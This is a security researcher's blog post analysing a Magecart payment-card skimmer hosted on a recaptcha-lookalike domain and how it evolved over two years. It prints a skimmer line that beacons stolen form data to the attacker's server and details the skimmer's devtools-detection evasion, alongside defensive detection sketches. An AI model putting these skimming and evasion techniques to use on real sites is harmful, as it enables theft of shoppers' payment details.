The Evolution of a Magecart Attack Leveraging Recaptcha.tech Domain

Ben Baryo
PerimeterX
10 min read · Aug 25, 2021

A breakdown of an attack served from recaptcha[.]tech and its progression over the course of two years.

Magecart in the Wild

One of my roles as a researcher at PerimeterX is to scour the web in search of threats, map the techniques used by fraudsters, and develop countermeasures for both detection and prevention.

Usually, monitoring the threat landscape is all about analyzing the latest techniques that avoid detection and maximize cybercriminal profits. However, while researching one particular Magecart attack, I traced the development of a skimmer over the course of two years. I found that along with the skimmer creator’s skill development, the trend of generalization — moving from targeting specifically named fields and forms to writing code that will work on most e-commerce sites — was very evident.

While the techniques used in the attack are common, I followed the progress of the skimmer and the choices made by the fraudster who developed it. It was obvious that, just like any other software developer, the creator of this skimmer also tackled issues of expanding support to other platforms and staying compatible with different implementations, while improving their research evasion techniques.

The Attack

This attack was found running on a variety of retail websites, with no obvious connection between them. What caught my eye was its use of recaptcha in the name of the malicious domain: recaptcha.tech. This campaign seems to have been going on for quite a while, as the server was registered as early as July 2019 and immediately started serving malicious JavaScript. It isn’t flagged by any vendor as serving malicious content, but the only content I found linked to it was skimmers served on compromised sites.

As with any Magecart attack, it poses a risk of customers’ payment details and personally identifiable information (PII) being stolen, and exposes the site owners to fines for breach of data protection laws such as GDPR, CCPA or NYPA. This should be of concern to any retail, media or other digital enterprise site owners, as it can negatively impact their user confidence and brand reputation.

Breakdown of the Attack

All of the sites that were hit by this attack had an inline loader embedded on every page. Though injected, the skimmer only activated where it found at least one of its targeted elements: a checkout form’s Submit button. Let’s check out the code found on one of the targeted sites — one which was still live up until recently before the owner was contacted.

The Loader

The site itself was compromised, and an inline script was injected into the main HTML, so it loaded on every path. It loads the skimmer into the page using jQuery’s ajax method, which not only fetches the content of the skimmer but also automatically injects it into the page.
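For site owners who want to check their own pages for this kind of loader, here is a minimal sketch rather than a complete scanner. It pulls absolute URLs out of inline script text and flags those whose host is not on an allowlist. The allowlist contents and the function names are assumptions for illustration, and the skimmer's actual loader is not reproduced here.

```javascript
// Hypothetical allowlist: hosts this site is expected to load scripts from.
const ALLOWED_SCRIPT_HOSTS = new Set([
  "www.google.com",
  "www.gstatic.com",
  "code.jquery.com",
]);

// Pull every absolute http(s) URL out of a chunk of inline script text.
function extractUrls(scriptText) {
  const matches = scriptText.match(/https?:\/\/[^\s'"`)<>]+/g);
  return matches === null ? [] : matches;
}

// Return the URLs in an inline script whose host is not on the allowlist.
function findUnexpectedHosts(scriptText, allowedHosts = ALLOWED_SCRIPT_HOSTS) {
  const flagged = [];
  for (const raw of extractUrls(scriptText)) {
    let host;
    try {
      host = new URL(raw).hostname;
    } catch (err) {
      continue; // not a parseable URL, skip it
    }
    if (!allowedHosts.has(host)) flagged.push(raw);
  }
  return flagged;
}
```

In a browser, the text of each inline script could be fed to findUnexpectedHosts one at a time. A string-based scan like this only catches URLs that appear in clear text, so an obfuscated loader would need a different approach.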

The Skimmer

Many of the variables, functions, and classes kept their original names (such as attackClass, tmp_keys, bad_keys, mobile, allow, crypt, format, and update_data) even though the script was obfuscated. I have renamed the rest with more meaningful, though sometimes lengthy, names. The code, shown in this GitHub gist, is already deobfuscated, with the obfuscation functions and variables removed for readability’s sake.

The Flow

  1. The skimmer listens to keydown events and determines if the user opens the devtools using different key combinations. If such a combination is observed, a localStorage key is set and the attack ceases.
  2. The script detects whether the session is running on mobile by matching the user agent string against strings that indicate a mobile browser, and by checking whether ontouchstart exists in the window and whether navigator.maxTouchPoints is greater than 0.
  3. If the session isn’t running on mobile, another verification that the devtools are closed is initiated, this time by testing the difference between outer and inner window dimensions.
  4. If the devtools key does not exist in localStorage (i.e. there’s no indication of devtools being open), the script iterates over a list of hard-coded css selectors. Most clearly indicate form submit buttons, some with names of payment vendors such as Braintree, Wizgo, or OneStepCheckout. For each selector that matches an element, the script sets an event listener for mouseover events on it and marks it with an empty onrotate attribute to avoid hooking the same element twice.
  5. The script proceeds to iterate over all input, select, textarea, and selected option elements and collect their name/ID and their value.
  6. The collected data is encrypted with a hard-coded key (dev.recaptcha.stream) and then encoded.
  7. If the script has indications that the devtools are open, all the mouseover event listeners, as well as the keydown listener, are removed, and the attack ceases. The configuration is removed and important variables are cleared of values.
  8. Steps 2–7 repeat every half a second.
  9. Once the mouseover event is triggered, the collected data is sent via navigator.sendBeacon to a hard-coded URL, and the attack is stopped.
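Step 2 matters to researchers because it decides whether the window-dimension check in step 3 runs at all. As a rough illustration of the three signals it names, here is a sketch that takes window-like and navigator-like objects so it can be exercised outside a browser. The marker list and the rule that all three signals must agree are assumptions; the source does not say how the skimmer combines them.

```javascript
// Illustrative markers only; the skimmer's real list is not reproduced here.
const MOBILE_UA_MARKERS = ["Android", "iPhone", "iPad", "Mobile"];

// Collect the three signals named in step 2.
function mobileSignals(win, nav) {
  const ua = String(nav.userAgent || "");
  return {
    uaMatch: MOBILE_UA_MARKERS.some((marker) => ua.includes(marker)),
    touchEvent: "ontouchstart" in win,
    touchPoints: Number(nav.maxTouchPoints || 0) > 0,
  };
}

// Assumption: all three signals must agree before the session counts as mobile.
function looksMobile(win, nav) {
  const signals = mobileSignals(win, nav);
  return signals.uaMatch && signals.touchEvent && signals.touchPoints;
}
```

In a browser this would be called as looksMobile(window, navigator). Note that a desktop browser in device-emulation mode can report a mobile user agent and touch support, which is one reason emulated sessions may behave differently from a plain desktop session when analyzing a script like this.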

The Take

  • The existence of the loader as an inline script suggests the site itself has been compromised rather than this being a supply chain attack.
  • While some skimmers bring their own jQuery “just in case”, this loader (and actually all of the loaders identified as part of this campaign) requires jQuery to already be present at the site in order to fetch the skimmer.
  • The hard-coded list of target buttons to place the event listener on consists of a number of different identifiable payment vendors, suggesting that this is a generic attack, probably spread across different sites.
  • The generic collection of data from the input fields supports the previous assessment.

Diversion Meant for Human Eyes

The use of recaptcha in the domain, especially when the real Recaptcha is embedded in the site, is meant to throw off casual devtools peekers. It’s easy to understand how at a glance the malicious https://recaptcha.tech/client/js/api.js can be confused for the innocuous https://www.google.com/recaptcha/api.js.
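The same confusion that fools a human eye is easy to check for mechanically. The sketch below flags any script URL that mentions recaptcha in its host or path but is not served from a host known to serve the real thing. The allowlist is an assumption and should be adjusted to whatever a given site legitimately uses; the function name is made up for this example.

```javascript
// Hosts assumed to legitimately serve Google reCAPTCHA scripts.
const LEGIT_RECAPTCHA_HOSTS = new Set([
  "www.google.com",
  "www.gstatic.com",
  "www.recaptcha.net",
]);

// True when a URL talks about recaptcha but comes from an unexpected host.
function isRecaptchaLookalike(scriptUrl) {
  const { hostname, pathname } = new URL(scriptUrl);
  const mentionsRecaptcha = /recaptcha/i.test(hostname + pathname);
  return mentionsRecaptcha && !LEGIT_RECAPTCHA_HOSTS.has(hostname);
}
```

With the two URLs from the paragraph above, the recaptcha.tech one is flagged and the www.google.com one is not.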

Even the exfiltration URL is disguised to look like a valid recaptcha endpoint: /verify.

Persistence is Key to Detecting Open Devtools

When you suspect there’s something wrong on a website, the first step is to open the developer tools window and look around. Peek in the Network tab to see if there’s any communication with an unfamiliar domain, or go over to the Sources tab to look for anything suspicious in the code. Perhaps you’d discover an out-of-place element in the Elements tab. There are a lot of ways to find attack indicators just by poking around the devtools, so there’s an incentive for skimmers to recognize if they’re being observed and to cease their operation.

This attack is no different in that respect. It employs a common method to check if the devtools are open by comparing the outer and inner window size. While most skimmers simply avoid running when possibly being monitored, this one also installs a keylogger that monitors the last 3 keydown events that took place. It looks for specific combinations starting with ctrl and shift, where the last event was one of its so-called “bad keys”, which are used to open the devtools (or view source) on Windows or Mac, in Chrome, Safari, or Opera. The commonly used F12 key is also monitored.
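To make the two heuristics concrete for anyone trying to inspect such a page without tripping them, here is a simplified sketch of each. It is not the skimmer's code: the pixel threshold, the list of bad keys, and the function names are assumptions, and the key check only covers the Ctrl+Shift combinations and F12 mentioned above.

```javascript
// Assumed threshold in pixels; a docked devtools panel usually takes more.
const DEVTOOLS_GAP_PX = 160;

// Heuristic 1: a large gap between outer and inner size hints at docked devtools.
function devtoolsLikelyDocked(win, threshold = DEVTOOLS_GAP_PX) {
  const widthGap = win.outerWidth - win.innerWidth;
  const heightGap = win.outerHeight - win.innerHeight;
  return widthGap > threshold || heightGap > threshold;
}

// Illustrative "bad keys": Ctrl+Shift+I/J/C open devtools panels in Chrome.
const BAD_KEYS = new Set(["I", "J", "C"]);

// Heuristic 2: inspect the most recent keydown `key` values, oldest first.
function isDevtoolsShortcut(lastKeys) {
  const last = lastKeys[lastKeys.length - 1];
  if (last === "F12") return true;
  if (lastKeys.length < 3) return false;
  const [first, second, third] = lastKeys.slice(-3);
  const modifiers = new Set([first, second]);
  return (
    modifiers.has("Control") &&
    modifiers.has("Shift") &&
    BAD_KEYS.has(third.toUpperCase())
  );
}
```

Both checks have obvious blind spots: the dimension test sees nothing when devtools are undocked into a separate window, and the key test sees nothing when devtools are opened from the browser menu.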

Once either mechanism determines the devtools were opened, a localStorage key is saved with its value set as the current datetime. The non-existence of this key is verified when the attack starts. If the key exists and is older than 3 hours, it is deleted. Otherwise, the attack is halted.
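The flag logic can be sketched as a small timestamp check. This is an illustration under assumptions, not the skimmer's code: the key name is hypothetical, the timestamp is stored as epoch milliseconds (the source only says "the current datetime"), and the script is assumed to proceed once an expired key is deleted. An in-memory stand-in for localStorage is included so the sketch runs outside a browser.

```javascript
const FLAG_KEY = "devtools_seen"; // hypothetical key name
const FLAG_TTL_MS = 3 * 60 * 60 * 1000; // 3 hours, as described above

// Minimal stand-in exposing the three localStorage methods used below.
function createMemoryStorage() {
  const map = new Map();
  return {
    getItem: (key) => (map.has(key) ? map.get(key) : null),
    setItem: (key, value) => { map.set(key, String(value)); },
    removeItem: (key) => { map.delete(key); },
  };
}

// Record the moment devtools were detected.
function markDevtoolsSeen(storage, now = Date.now()) {
  storage.setItem(FLAG_KEY, String(now));
}

// True while a fresh flag exists; an expired flag is deleted first.
function shouldHalt(storage, now = Date.now()) {
  const raw = storage.getItem(FLAG_KEY);
  if (raw === null) return false;
  if (now - Number(raw) > FLAG_TTL_MS) {
    storage.removeItem(FLAG_KEY);
    return false;
  }
  return true;
}
```

A practical consequence for researchers: once the flag is set, the skimmer stays dormant in that browser profile until the key expires or is cleared, so a page that looks clean on a second visit may simply be remembering the first one.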

Evolution of a Skimmer: Getting More Classy

As previously mentioned, this campaign isn’t new, and while some attacks are still live, earlier iterations can be tracked all the way back to July 2019 when the server was registered. I went back and dug up previous versions of the skimmer served from the same domain and found it interesting to see the development of the skimmer, especially between its earliest version and the latest one.

Breakdown of an Earlier Attack

Here’s the earlier version of the skimmer. The loader was almost the same as the latest version, so I skipped it to avoid code clutter.

The Skimmer

The code, shown in this GitHub gist, was deobfuscated with the obfuscation functions and variables removed for readability. The functions and variables were then renamed according to the latest version in order to simplify the comparison.

The Flow

Here’s how this early version performed the skimming:

  1. When the window is resized, a check for whether the devtools were open would run by testing the difference between outer and inner window dimensions. A localStorage key would be set if the devtools were detected.
  2. The localStorage key is checked every second. If the key exists, any data the skimmer may have already collected is removed; if more than an hour has passed since the key was set, the key itself is removed.
  3. The script checks if a button exists by looking for a hard-coded css selector 4 times a second.
  4. Once the button is located, the script marks it by setting an attribute on it, clones it, adds an event listener for clicks, and replaces the original with the clone while keeping the original stashed away.
  5. When the user clicks on the button, a hard-coded list of fields is collected and stored in the localStorage, under a different key than the one used for detecting devtools.
  6. The script creates an Image tag and disguises it as a 1 pixel gif file, though the actual destination is a php file, with the payload attached as part of the otherwise hard-coded query string.
  7. Once the Image tag is added to the DOM, the script removes that newly injected image tag as well as the collected data stored in the localStorage, replaces the clone with the original node, and clicks the original button.

The Differences

The first thing I noticed was that this is a straightforward linear script, without the more structured class and methods of the latest version. But the fraudster’s improving coding skills aren’t really why I thought it interesting to compare versions; the expanding scope is.

The comparison shows obvious signs of improvement, not just in the script’s structure and techniques, but also in the ability to target more sites with the same code without needing to adjust the code for each attack.

I will focus on 3 key areas in which I noticed specific improvements: field targeting, button hooking, and data exfiltration.

Field Targeting

The earliest version operates by hard-coding the css selectors matching the targeted input fields and the attributes that should be harvested from them.

These are specifically selected to match a certain payment provider or framework which uses these hard-coded IDs.

A later version moves from hard-coded IDs to specifying the tag name along with its name attribute, perhaps due to a change in the framework or a change in the targets of this attack.

In this intermediate version, additional information on country code and state is specifically collected. The collection itself, including the switch statement, is kept the same.

In the latest version, the code iterates over all input, select, and textarea fields found on the page, dynamically extracting each field’s name/ID and the attribute that holds the targeted data.

This strategy allows the same script to run on pretty much any page that provides access to these input fields without any need for modification.

Button Hooking

The design choice for when to start the actual harvesting has also been revisited between the earliest version and the intermediate one, not changing again for any future version.

The earliest version started the attack after the replacement button was clicked:

The intermediate version changed the timing of data collection: data was now collected on an interval, not bound to a click on the submit button, and the click only initiated the data exfiltration.

You’ll also notice that the targeted button’s css selector has changed, probably targeting a different payment provider.

The version that came after that already made the jump from replacing the button to hooking the original. It used an object where the key is the css selector for a checkout button that might be on the page, and the value notes whether it has been hooked (useful to avoid double-hooking and to remove hooking when the attack is completed).

The latest version does away with the objects object (but keeps the name) and simply sets an innocuous attribute on hooked buttons. Notice the newly added css selectors, which suggest this version caters to a much broader selection of possible targets.
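The marker attribute doubles as an indicator that a page has been hooked. The skimmer's own code is not reproduced here; instead, this is a small sketch a site owner could use to look for it, assuming the marker is the onrotate attribute named in the flow earlier. The function name and the shape of the returned summary are made up for this example.

```javascript
// Return a short summary of every element carrying the marker attribute.
// `root` is anything with querySelectorAll, such as `document` in a browser.
function findMarkedElements(root, markerAttr = "onrotate") {
  const hits = root.querySelectorAll("[" + markerAttr + "]");
  return Array.from(hits, (el) => ({
    tag: String(el.tagName || "").toLowerCase(),
    id: el.id || null,
  }));
}
```

In a browser console, findMarkedElements(document) returning a non-empty list on a checkout page would be worth a closer look, although a later version of the skimmer could trivially switch to a different attribute name.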

Data Exfiltration

Another interesting change is in the techniques used to exfiltrate the stolen data back to the fraudster’s server.

The earliest version injects an image element and sets the src attribute to point at the fraudster’s server. The encrypted stolen data hides as part of the query string, which also includes some “noise” to make this request seem less suspicious.

You’ll notice how the width and height of the element were set to 1x1, similar to a tracking pixel. I’m not sure if at that time the server actually returned a pixel response, but in any case, another function running four times a second would search for this image element and remove it once it was found.

A later intermediate version made the change to send the data not when the button was clicked, but when the mouse hovered over the button. Instead of using the image.src technique, it utilized the sendBeacon function, which did not elicit a response from the target server. Was this a way to lower costs or to simply expedite the exfiltration?

send() {navigator.sendBeacon(config.backend, config.data);}
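On the defensive side, one way to observe this channel is to wrap sendBeacon before any other script runs. The following is a sketch under assumptions, not a complete countermeasure: the function name, the allowlist, and the report callback are hypothetical, and a script that captured a reference to the original function before the wrapper was installed would bypass it.

```javascript
// Wrap nav.sendBeacon so beacons to hosts outside the allowlist are
// reported and dropped. Returns a function that undoes the wrapping.
function guardSendBeacon(nav, allowedHosts, baseUrl, report) {
  const original = nav.sendBeacon.bind(nav);
  nav.sendBeacon = function (url, data) {
    // Resolve relative URLs against the page URL to get the target host.
    const host = new URL(String(url), baseUrl).hostname;
    if (!allowedHosts.has(host)) {
      report({ host, url: String(url) });
      return false; // mimic "beacon could not be queued"
    }
    return original(url, data);
  };
  return function restore() {
    nav.sendBeacon = original;
  };
}
```

In a browser this could be installed as guardSendBeacon(navigator, new Set([location.hostname]), location.href, console.warn) from the first script on the page. A Content-Security-Policy connect-src directive covers the same channel at the browser level and is harder for injected code to undo.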

I would venture a guess that hooking the button instead of replacing it, and using mouseover together with this sendBeacon technique, are all part of an attempt to be less intrusive and to avoid changing the flow of the site. Changing the flow might end up breaking the site, making the attack noisier and possibly alerting the users and the owner of the site to it.

Between employing more techniques to identify when the script is being observed (open devtools), limiting the scope of the variables, and cleaning up when the attack is halted, there is an observable active effort made by the fraudster to avert research and detection of the attack.

To Recap(tcha)

This skimmer evolved over the course of two years, from an attack targeting specific fields on a single site configuration into a generic attack that is compatible with a range of frameworks or payment providers.

Over time, some techniques were enhanced in quality, ensuring the skimmer ran its course while also improving anti-research protection. Others — like the use of a key in the localStorage to halt the attack, and the encryption functions — remained the same. If a certain method works, like hiding behind a server evoking the name recaptcha, why change it? Keep in mind that while this skimmer does not exhibit any advanced characteristics that would prove a challenge to most detection solutions, it still ran uninterrupted for quite a while, probably due in part to its maintainer’s adaptability.
